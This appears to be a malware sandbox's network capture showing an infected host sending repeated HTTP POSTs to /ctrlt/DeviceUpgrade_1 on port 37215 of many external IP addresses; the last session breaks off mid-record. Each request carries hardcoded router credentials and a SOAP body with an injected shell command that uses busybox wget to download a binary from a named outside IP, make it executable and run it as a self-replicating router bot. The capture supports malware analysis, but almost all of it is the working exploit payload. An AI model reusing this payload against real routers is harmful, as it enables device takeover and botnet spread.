                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1017192.168.2.134145441.104.30.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430094957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1018192.168.2.1351468157.219.187.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430109978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1019192.168.2.1354182171.52.185.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430425882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1020192.168.2.135467641.51.205.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430470943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1021192.168.2.135620241.146.119.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430474997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1022192.168.2.1349888157.169.17.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430515051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1023192.168.2.1338414157.140.76.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430526018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1024192.168.2.1357662132.166.230.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430538893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1025192.168.2.1348936197.248.185.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430552959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1026192.168.2.1334536206.254.233.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.430614948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 